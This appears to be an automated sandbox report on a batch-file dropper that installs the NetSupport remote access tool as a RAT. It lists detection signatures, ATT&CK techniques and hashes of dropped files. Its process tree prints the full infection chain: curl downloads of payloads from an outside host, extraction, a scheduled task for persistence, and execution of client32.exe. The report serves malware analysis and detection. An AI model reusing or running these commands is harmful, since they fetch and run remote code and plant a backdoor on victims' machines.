netsupport | b2069732f98d91fc2b2814c687115ab927191a0db26dd21a9ac0f7f79a65672b

Analysis

max time kernel
135s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
27/05/2023, 08:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

11.bat
Size

1KB
MD5

2bf18395638967388a293626e977ec05
SHA1

c8534f92211399f890e3757da136c899f14b53b3
SHA256

b2069732f98d91fc2b2814c687115ab927191a0db26dd21a9ac0f7f79a65672b
SHA512

3e2234ba2916935ec9edf6b98d00a012e0d8b754a30350234335f52e0463a44fd11a7642877364f4ce0ca81d3ddf78d899e5d983ffbf6bacc60c065ed36f1f83

Score

10^/10

netsupport rat

Malware Config

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1532	7zz.exe
4100	client32.exe

Loads dropped DLL 6 IoCs

pid	Process
4100	client32.exe
4100	client32.exe
4100	client32.exe
4100	client32.exe
4100	client32.exe
4100	client32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4820	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4600	timeout.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeSecurityPrivilege	4100	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4100	client32.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 1644 wrote to memory of 1112	1644	cmd.exe	85
PID 1644 wrote to memory of 1112	1644	cmd.exe	85
PID 1112 wrote to memory of 1580	1112	cmd.exe	86
PID 1112 wrote to memory of 1580	1112	cmd.exe	86
PID 1644 wrote to memory of 2168	1644	cmd.exe	87
PID 1644 wrote to memory of 2168	1644	cmd.exe	87
PID 2168 wrote to memory of 3148	2168	cmd.exe	88
PID 2168 wrote to memory of 3148	2168	cmd.exe	88
PID 1644 wrote to memory of 4392	1644	cmd.exe	89
PID 1644 wrote to memory of 4392	1644	cmd.exe	89
PID 4392 wrote to memory of 216	4392	cmd.exe	90
PID 4392 wrote to memory of 216	4392	cmd.exe	90
PID 1644 wrote to memory of 4664	1644	cmd.exe	91
PID 1644 wrote to memory of 4664	1644	cmd.exe	91
PID 4664 wrote to memory of 5032	4664	cmd.exe	92
PID 4664 wrote to memory of 5032	4664	cmd.exe	92
PID 4664 wrote to memory of 560	4664	cmd.exe	94
PID 4664 wrote to memory of 560	4664	cmd.exe	94
PID 4664 wrote to memory of 3348	4664	cmd.exe	93
PID 4664 wrote to memory of 3348	4664	cmd.exe	93
PID 4664 wrote to memory of 4600	4664	cmd.exe	95
PID 4664 wrote to memory of 4600	4664	cmd.exe	95
PID 3348 wrote to memory of 1532	3348	cmd.exe	96
PID 3348 wrote to memory of 1532	3348	cmd.exe	96
PID 3348 wrote to memory of 1532	3348	cmd.exe	96
PID 4664 wrote to memory of 4820	4664	cmd.exe	97
PID 4664 wrote to memory of 4820	4664	cmd.exe	97
PID 4664 wrote to memory of 4712	4664	cmd.exe	98
PID 4664 wrote to memory of 4712	4664	cmd.exe	98
PID 4712 wrote to memory of 4100	4712	cmd.exe	99
PID 4712 wrote to memory of 4100	4712	cmd.exe	99
PID 4712 wrote to memory of 4100	4712	cmd.exe	99

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1644
- C:\Windows\system32\cmd.exe
  cmd.exe /c C:\ProgramData\sett.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Windows\system32\curl.exe
    curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/tempy.7z" -o "C:\ProgramData\tempy.7z"
    3⤵
    PID:1580
- C:\Windows\system32\cmd.exe
  cmd.exe /c C:\ProgramData\7z.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\system32\curl.exe
    curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/7z.exe" -o "C:\ProgramData\7zz.exe"
    3⤵
    PID:3148
- C:\Windows\system32\cmd.exe
  cmd.exe /c C:\ProgramData\2.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Windows\system32\curl.exe
    curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/2.bat" -o "C:\ProgramData\2.bat"
    3⤵
    PID:216
- C:\Windows\system32\cmd.exe
  cmd.exe /c C:\ProgramData\2.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4664
- - C:\Windows\system32\xcopy.exe
    xcopy /h /y 7zz.exe C:\ProgramData\
    3⤵
    PID:5032
- - C:\Windows\system32\cmd.exe
    cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3348
  - - C:\ProgramData\7zz.exe
      C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\
      4⤵
      Executes dropped EXE
      PID:1532
- - C:\Windows\system32\xcopy.exe
    xcopy /h /y tempy.7z C:\ProgramData\
    3⤵
    PID:560
- - C:\Windows\system32\timeout.exe
    TIMEOUT /T 2
    3⤵
    - Delays execution with timeout.exe
    PID:4600
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /create /F /tn "VCC_runner2" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 7 /sd 01/01/2022 /st 00:00
    3⤵
    - Creates scheduled task(s)
    PID:4820
- - C:\Windows\system32\cmd.exe
    cmd /c C:\ProgramData\client32.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4712
  - - C:\ProgramData\client32.exe
      C:\ProgramData\client32.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:4100

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\2.bat

Filesize
202B

MD5
9d012776fb8716fbccf70bb57ae7c7a2

SHA1
bb5dd6998bd3e58259a8da00dec82b910f0cba95

SHA256
cf3fd955993cc009626ce769ec543d1f951911fb891fccb2c33700c37d3488f1

SHA512
79e7c4ba9baac4c1e0cd1cf308f7ce02f98e56d12abf3d5745fa6a5d1bcf55170a83134894b1e427893c1b8be70b0473e1fe45d062af806e9f60cf599533fe94

Download Submit
C:\ProgramData\2.bat

Filesize
435B

MD5
20339443a8789c448d23bb7d7d227373

SHA1
0998e456d72d1e0a323761b88f0b6f27eeed3119

SHA256
db9bfac3e8c8667293f5685032eb088e4c2078c308ef59464241e5b89c28143f

SHA512
ffe37c8b2632597c18ab837d833090498ee982c3cd5409f3a6d88fc787e4795bdec3acd2a450fd7060785d8219acccf9d6bc797b092d1de79acc0fc2d1444e7f

Download Submit
C:\ProgramData\7z.bat

Filesize
208B

MD5
7fc6d26bb3e5ff0178bbca973729469f

SHA1
243bf47775c7bbf1498a7b026dffe0b4ed4a3cd3

SHA256
59b8fd877b81ab11211b03d4707db2f1f36b30ac2318a34d61300c57588fb495

SHA512
614331c41bd6ede3a1c91cfcea3a01569f6af4def0f61acb259f0998bfb5d829a36771c393b5169c52e3f1da9d91592a00c1062607b4f23d4a2fcf8f3f978f37

Download Submit
C:\ProgramData\7zz.exe

Filesize
574KB

MD5
42badc1d2f03a8b1e4875740d3d49336

SHA1
cee178da1fb05f99af7a3547093122893bd1eb46

SHA256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA512
6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

Download Submit
C:\ProgramData\7zz.exe

Filesize
574KB

MD5
42badc1d2f03a8b1e4875740d3d49336

SHA1
cee178da1fb05f99af7a3547093122893bd1eb46

SHA256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA512
6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

Download Submit
C:\ProgramData\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\ProgramData\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\ProgramData\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\ProgramData\NSM.LIC

Filesize
258B

MD5
1b41e64c60ca9dfadeb063cd822ab089

SHA1
abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

SHA256
f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

SHA512
c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

Download Submit
C:\ProgramData\PCICHEK.DLL

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\ProgramData\PCICL32.DLL

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\ProgramData\PCICL32.dll

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\ProgramData\TCCTL32.DLL

Filesize
387KB

MD5
eab603d12705752e3d268d86dff74ed4

SHA1
01873977c871d3346d795cf7e3888685de9f0b16

SHA256
6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea

SHA512
77de0d9c93ccba967db70b280a85a770b3d8bea3b707b1abb037b2826b48898fec87924e1a6cce218c43478e5209e9eb9781051b4c3b450bea3cd27dbd32c7f3

Download Submit
C:\ProgramData\TCCTL32.DLL

Filesize
387KB

MD5
eab603d12705752e3d268d86dff74ed4

SHA1
01873977c871d3346d795cf7e3888685de9f0b16

SHA256
6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea

SHA512
77de0d9c93ccba967db70b280a85a770b3d8bea3b707b1abb037b2826b48898fec87924e1a6cce218c43478e5209e9eb9781051b4c3b450bea3cd27dbd32c7f3

Download Submit
C:\ProgramData\client32.exe

Filesize
116KB

MD5
ba69ff5da9131aa06a6509b05ae1a78f

SHA1
fc1ea269f940b49822885449b3c406a237f4832a

SHA256
d4d475aee58cab94a918c92c65a7d462f4dd5b9ec15b194162483be711f5bfbb

SHA512
e4dd4388f40e027b5d909bb35d77197f0814148605211ee88de77cb4420438c8a4e58bba5f4ed0828d616d0ebad4b905713595f38f7a236244c56cbc0f647a19

Download Submit
C:\ProgramData\client32.exe

Filesize
116KB

MD5
ba69ff5da9131aa06a6509b05ae1a78f

SHA1
fc1ea269f940b49822885449b3c406a237f4832a

SHA256
d4d475aee58cab94a918c92c65a7d462f4dd5b9ec15b194162483be711f5bfbb

SHA512
e4dd4388f40e027b5d909bb35d77197f0814148605211ee88de77cb4420438c8a4e58bba5f4ed0828d616d0ebad4b905713595f38f7a236244c56cbc0f647a19

Download Submit
C:\ProgramData\client32.ini

Filesize
600B

MD5
9fd51ba7e1b8b8c4586354338df32acc

SHA1
30f194d6f87be214031410adeaf5f9df4f7945e2

SHA256
7d1302fc5aeb3aa1233d44cea8263ee577041c92d7aab5cad69dce94574ef49a

SHA512
04d9db9653d98e578631a743dd7693ee3094d1c25e83e0bf66ab42e3b00e0abeeebf03e982d4392fb5ed49b9698062d7ba2350f209c1af721c064fda17cb9760

Download Submit
C:\ProgramData\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\ProgramData\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\ProgramData\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\ProgramData\pcichek.dll

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\ProgramData\sett.bat

Filesize
218B

MD5
682951b449a6ba6a19e6c5130e3c5ed7

SHA1
e1a6510e4ba54099e13778b0cccdb08ecf0e7bb6

SHA256
e169d1b5f8af9388db4bdcf019cfadbd5daa078427cc5662d43c74dd6b7864da

SHA512
4790b4b636042bea53f22a2cec96f9b3b04920b2941dbc3edad62c611821200042d4cf0979c40c7a96cec1c16d1f76c53f7e6509b04ce1c01e0bf268aa45a127

Download Submit
C:\ProgramData\tempy.7z

Filesize
2.2MB

MD5
6979bbce289387135ab861f59d2e0483

SHA1
475f466a7f6c37c2d9d64cef1489b3220f58d0ce

SHA256
8973b65aad1ee3f3b2bfa7038f8eaaae97e8b3dfffff6a6e6ef3e5eec04da498

SHA512
a719943df9b73b59c1ed0a9921a0eaa626d3dde9fdb912577d53b2c6852e77adcfff8af2af71ee4e0fd3cda8fab78d89771d43159059febe07e626c2f692c58f

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads